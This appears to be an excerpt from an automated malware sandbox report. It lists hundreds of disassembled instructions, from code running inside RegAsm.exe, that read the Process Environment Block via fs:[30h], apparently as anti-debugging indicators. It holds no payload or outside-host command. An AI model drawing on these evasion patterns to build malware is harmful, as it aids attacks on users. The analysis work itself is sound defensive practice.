                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1C0F0 mov eax, dword ptr fs:[00000030h]5_2_02B1C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B620F0 mov ecx, dword ptr fs:[00000030h]5_2_02B620F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B450E4 mov eax, dword ptr fs:[00000030h]5_2_02B450E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B450E4 mov ecx, dword ptr fs:[00000030h]5_2_02B450E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1A0E3 mov ecx, dword ptr fs:[00000030h]5_2_02B1A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA60E0 mov eax, dword ptr fs:[00000030h]5_2_02BA60E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B280E9 mov eax, dword ptr fs:[00000030h]5_2_02B280E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA20DE mov eax, dword ptr fs:[00000030h]5_2_02BA20DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF50D9 mov eax, dword ptr fs:[00000030h]5_2_02BF50D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B490DB mov eax, dword ptr fs:[00000030h]5_2_02B490DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov ecx, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov ecx, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov ecx, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov ecx, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C0 mov eax, dword ptr fs:[00000030h]5_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9D0C0 mov eax, dword ptr fs:[00000030h]5_2_02B9D0C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9D0C0 mov eax, dword ptr fs:[00000030h]5_2_02B9D0C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE903E mov eax, dword ptr fs:[00000030h]5_2_02BE903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE903E mov eax, dword ptr fs:[00000030h]5_2_02BE903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE903E mov eax, dword ptr fs:[00000030h]5_2_02BE903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE903E mov eax, dword ptr fs:[00000030h]5_2_02BE903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1A020 mov eax, dword ptr fs:[00000030h]5_2_02B1A020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1C020 mov eax, dword ptr fs:[00000030h]5_2_02B1C020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3E016 mov eax, dword ptr fs:[00000030h]5_2_02B3E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3E016 mov eax, dword ptr fs:[00000030h]5_2_02B3E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3E016 mov eax, dword ptr fs:[00000030h]5_2_02B3E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3E016 mov eax, dword ptr fs:[00000030h]5_2_02B3E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA4000 mov ecx, dword ptr fs:[00000030h]5_2_02BA4000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov ecx, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31070 mov eax, dword ptr fs:[00000030h]5_2_02B31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4C073 mov eax, dword ptr fs:[00000030h]5_2_02B4C073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9D070 mov ecx, dword ptr fs:[00000030h]5_2_02B9D070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA106E mov eax, dword ptr fs:[00000030h]5_2_02BA106E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF5060 mov eax, dword ptr fs:[00000030h]5_2_02BF5060
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B22050 mov eax, dword ptr fs:[00000030h]5_2_02B22050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BC705E mov ebx, dword ptr fs:[00000030h]5_2_02BC705E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BC705E mov eax, dword ptr fs:[00000030h]5_2_02BC705E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4B052 mov eax, dword ptr fs:[00000030h]5_2_02B4B052
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA6050 mov eax, dword ptr fs:[00000030h]5_2_02BA6050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3B1B0 mov eax, dword ptr fs:[00000030h]5_2_02B3B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD11A4 mov eax, dword ptr fs:[00000030h]5_2_02BD11A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD11A4 mov eax, dword ptr fs:[00000030h]5_2_02BD11A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD11A4 mov eax, dword ptr fs:[00000030h]5_2_02BD11A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD11A4 mov eax, dword ptr fs:[00000030h]5_2_02BD11A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA019F mov eax, dword ptr fs:[00000030h]5_2_02BA019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA019F mov eax, dword ptr fs:[00000030h]5_2_02BA019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA019F mov eax, dword ptr fs:[00000030h]5_2_02BA019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA019F mov eax, dword ptr fs:[00000030h]5_2_02BA019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1A197 mov eax, dword ptr fs:[00000030h]5_2_02B1A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1A197 mov eax, dword ptr fs:[00000030h]5_2_02B1A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1A197 mov eax, dword ptr fs:[00000030h]5_2_02B1A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B77190 mov eax, dword ptr fs:[00000030h]5_2_02B77190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B60185 mov eax, dword ptr fs:[00000030h]5_2_02B60185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDC188 mov eax, dword ptr fs:[00000030h]5_2_02BDC188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDC188 mov eax, dword ptr fs:[00000030h]5_2_02BDC188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BC71F9 mov esi, dword ptr fs:[00000030h]5_2_02BC71F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B501F8 mov eax, dword ptr fs:[00000030h]5_2_02B501F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF61E5 mov eax, dword ptr fs:[00000030h]5_2_02BF61E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B451EF mov eax, dword ptr fs:[00000030h]5_2_02B451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B251ED mov eax, dword ptr fs:[00000030h]5_2_02B251ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5D1D0 mov eax, dword ptr fs:[00000030h]5_2_02B5D1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5D1D0 mov ecx, dword ptr fs:[00000030h]5_2_02B5D1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9E1D0 mov eax, dword ptr fs:[00000030h]5_2_02B9E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9E1D0 mov eax, dword ptr fs:[00000030h]5_2_02B9E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9E1D0 mov ecx, dword ptr fs:[00000030h]5_2_02B9E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9E1D0 mov eax, dword ptr fs:[00000030h]5_2_02B9E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9E1D0 mov eax, dword ptr fs:[00000030h]5_2_02B9E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF51CB mov eax, dword ptr fs:[00000030h]5_2_02BF51CB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE61C3 mov eax, dword ptr fs:[00000030h]5_2_02BE61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE61C3 mov eax, dword ptr fs:[00000030h]5_2_02BE61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B21131 mov eax, dword ptr fs:[00000030h]5_2_02B21131
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B21131 mov eax, dword ptr fs:[00000030h]5_2_02B21131
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1B136 mov eax, dword ptr fs:[00000030h]5_2_02B1B136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1B136 mov eax, dword ptr fs:[00000030h]5_2_02B1B136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1B136 mov eax, dword ptr fs:[00000030h]5_2_02B1B136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1B136 mov eax, dword ptr fs:[00000030h]5_2_02B1B136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B50124 mov eax, dword ptr fs:[00000030h]5_2_02B50124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BCA118 mov ecx, dword ptr fs:[00000030h]5_2_02BCA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BCA118 mov eax, dword ptr fs:[00000030h]5_2_02BCA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BCA118 mov eax, dword ptr fs:[00000030h]5_2_02BCA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BCA118 mov eax, dword ptr fs:[00000030h]5_2_02BCA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE0115 mov eax, dword ptr fs:[00000030h]5_2_02BE0115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB9179 mov eax, dword ptr fs:[00000030h]5_2_02BB9179
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F172 mov eax, dword ptr fs:[00000030h]5_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B27152 mov eax, dword ptr fs:[00000030h]5_2_02B27152
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB8158 mov eax, dword ptr fs:[00000030h]5_2_02BB8158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B26154 mov eax, dword ptr fs:[00000030h]5_2_02B26154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B26154 mov eax, dword ptr fs:[00000030h]5_2_02B26154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1C156 mov eax, dword ptr fs:[00000030h]5_2_02B1C156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF5152 mov eax, dword ptr fs:[00000030h]5_2_02BF5152
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B19148 mov eax, dword ptr fs:[00000030h]5_2_02B19148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B19148 mov eax, dword ptr fs:[00000030h]5_2_02B19148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B19148 mov eax, dword ptr fs:[00000030h]5_2_02B19148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B19148 mov eax, dword ptr fs:[00000030h]5_2_02B19148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB4144 mov eax, dword ptr fs:[00000030h]5_2_02BB4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB4144 mov eax, dword ptr fs:[00000030h]5_2_02BB4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB4144 mov ecx, dword ptr fs:[00000030h]5_2_02BB4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB4144 mov eax, dword ptr fs:[00000030h]5_2_02BB4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB4144 mov eax, dword ptr fs:[00000030h]5_2_02BB4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B176B2 mov eax, dword ptr fs:[00000030h]5_2_02B176B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B176B2 mov eax, dword ptr fs:[00000030h]5_2_02B176B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B176B2 mov eax, dword ptr fs:[00000030h]5_2_02B176B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B566B0 mov eax, dword ptr fs:[00000030h]5_2_02B566B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5C6A6 mov eax, dword ptr fs:[00000030h]5_2_02B5C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1D6AA mov eax, dword ptr fs:[00000030h]5_2_02B1D6AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1D6AA mov eax, dword ptr fs:[00000030h]5_2_02B1D6AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B24690 mov eax, dword ptr fs:[00000030h]5_2_02B24690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B24690 mov eax, dword ptr fs:[00000030h]5_2_02B24690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA368C mov eax, dword ptr fs:[00000030h]5_2_02BA368C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA368C mov eax, dword ptr fs:[00000030h]5_2_02BA368C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA368C mov eax, dword ptr fs:[00000030h]5_2_02BA368C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA368C mov eax, dword ptr fs:[00000030h]5_2_02BA368C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9E6F2 mov eax, dword ptr fs:[00000030h]5_2_02B9E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9E6F2 mov eax, dword ptr fs:[00000030h]5_2_02B9E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9E6F2 mov eax, dword ptr fs:[00000030h]5_2_02B9E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9E6F2 mov eax, dword ptr fs:[00000030h]5_2_02B9E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA06F1 mov eax, dword ptr fs:[00000030h]5_2_02BA06F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA06F1 mov eax, dword ptr fs:[00000030h]5_2_02BA06F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDD6F0 mov eax, dword ptr fs:[00000030h]5_2_02BDD6F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4D6E0 mov eax, dword ptr fs:[00000030h]5_2_02B4D6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4D6E0 mov eax, dword ptr fs:[00000030h]5_2_02B4D6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB36EE mov eax, dword ptr fs:[00000030h]5_2_02BB36EE
